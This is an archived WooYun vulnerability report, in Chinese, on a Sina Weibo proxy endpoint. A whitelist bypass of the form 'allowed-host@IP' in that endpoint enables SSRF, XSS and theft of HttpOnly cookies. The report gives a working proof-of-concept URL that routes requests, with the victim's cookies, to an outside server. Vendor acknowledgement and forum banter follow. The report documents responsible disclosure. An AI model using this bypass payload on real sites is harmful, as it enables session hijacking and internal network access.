当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160643

漏洞标题:微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害

相关厂商:新浪微博

漏洞作者: 呆子不开口

提交时间:2015-12-12 08:56

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-12: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

微博上你点我的链接,我就可xss你,并可拿到httponly的cookie,以及些其他方面的危害

详细说明:

见如下请求,实现了一个代理访问url的功能
http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn
这个请求做了些url白名单的校验
但有如下问题:
一、存在绕过漏洞,导致ssrf漏洞,可以访问内网
这个代理功能存在url绕过漏洞,api参数使用下面格式的值可以绕过
http://contentrecommend.mobile.sina.cn@123.57.73.3/wb.php
攻击poc见:http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn%40123.57.73.3%2Fwb.php
服务端程序会去请求http://123.57.73.3/wb.php
这样就可以ssrf访问内网了
二、xss
如果我们代理访问的是我们控制的页面,我们的页面可以输出一个存储xss了
三、httponly cookie
程序在代理访问我们的页面时,会把当前用户的cookie也带给我们。我的服务端php程序,通过$_SERVER['HTTP_COOKIE']就可以取到

漏洞证明:

QQ20151210-0.png

修复方案:

做好白名单校验

版权声明:转载请注明来源 呆子不开口@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-14 13:03

厂商回复:

感谢关注新浪安全,安全问题修复中。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-12 09:00 | king7 ( 普通白帽子 | Rank:1554 漏洞数:226 | Python真是美妙~~)

    我表哥又来了

  2. 2015-12-12 09:11 | 大师兄 ( 路人 | Rank:29 漏洞数:7 | 每日必关注乌云)

    @king7 你表哥真多、、

  3. 2015-12-12 09:15 | mramydnei ( 普通白帽子 | Rank:376 漏洞数:83 | 一个逗逼运维)

    我就是不点 看你怎么X我

  4. 2015-12-12 09:20 | 1937nick ( 普通白帽子 | Rank:123 漏洞数:40 | 水能载舟,亦能煮粥。物尽其用,人尽其能。)

    危害等级:中漏洞Rank:8确认时间:2015-11-25 16:46

  5. 2015-12-12 09:54 | 八戒 ( 路人 | Rank:17 漏洞数:3 | ~~鬼畜之王~~)

    @大师兄啥时候带我飞

  6. 2015-12-12 09:55 | imp0rt ( 普通白帽子 | Rank:109 漏洞数:51 | 剑影。。。)

    @大师兄啥时候带我飞

  7. 2015-12-12 09:55 | 陆由乙 ( 普通白帽子 | Rank:316 漏洞数:81 | 呵呵!)

  8. 2015-12-12 10:33 | 火风暴 ( 路人 | Rank:25 漏洞数:5 | 黑夜给了我无情的眼睛让我拿着冷血的剑,策...)

    6666

  9. 2015-12-12 11:09 | 齐迹 ( 普通白帽子 | Rank:784 漏洞数:100 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    蠕一把!

  10. 2015-12-12 11:12 | onpu ( 普通白帽子 | Rank:152 漏洞数:37 | 勿忘初心)

    表哥来了

  11. 2015-12-12 11:22 | 随风的风 ( 普通白帽子 | Rank:190 漏洞数:67 | 微信公众号:233sec 不定期分享各种漏洞思...)

    又扶了扶眼镜。

  12. 2015-12-12 12:16 | Submit ( 普通白帽子 | Rank:524 漏洞数:117 | http://www.wooyun.org/flea/165 还有一个...)

    我的老表终于出场了

  13. 2015-12-12 12:29 | k0_pwn ( 实习白帽子 | Rank:51 漏洞数:11 | 专注且自由)

    伟哥又要发威了!

  14. 2015-12-12 13:06 | 从容 ( 普通白帽子 | Rank:231 漏洞数:77 | Enjoy Hacking Just Because It's Fun :) ...)

    伟哥高考语文是省状元吧

  15. 2015-12-12 13:46 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)

    吃惊

  16. 2015-12-12 16:19 | 5t4rk ( 路人 | Rank:20 漏洞数:1 | 不积跬步无以至千里,不积小流无以成江海)

    牛逼,膜拜

  17. 2015-12-12 18:11 | bit4 ( 路人 | Rank:2 漏洞数:1 | 终于,我也是有ID的人了!)

    http://drops.wooyun.org/papers/501

  18. 2015-12-12 18:34 | 神话般的孩纸 ( 路人 | Rank:25 漏洞数:9 | 非技术人员,信息安全爱好者)

    妈妈问我为什么跪在电脑前。。。

  19. 2015-12-12 22:08 | 呆子不开口 ( 普通白帽子 | Rank:370 漏洞数:34 | 求各种兼职)

    @bit4 不是

  20. 2015-12-12 22:23 | 盛大在线(乌云厂商)

    @bit4 你太小看人家了

  21. 2015-12-12 22:37 | 小思 ( 路人 | Rank:17 漏洞数:2 | 乌云杰出青年 | null)

    @盛大在线 呦

  22. 2015-12-14 08:54 | bit4 ( 路人 | Rank:2 漏洞数:1 | 终于,我也是有ID的人了!)

    @盛大在线 是我太菜逼...

  23. 2015-12-14 08:55 | bit4 ( 路人 | Rank:2 漏洞数:1 | 终于,我也是有ID的人了!)

    @呆子不开口 好吧,等着公开了,膜拜大神。

  24. 2015-12-15 15:52 | 佳佳佳佳佳 认证白帽子 ( 路人 | Rank:23 漏洞数:5 | I want to be ur sunshine.)

    我还以为是bug了 原来是个新洞~偶像好厉害!

  25. 2016-01-08 20:52 | 齐迹 ( 普通白帽子 | Rank:784 漏洞数:100 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    居然会带上cookie去访问。。。这个有点意思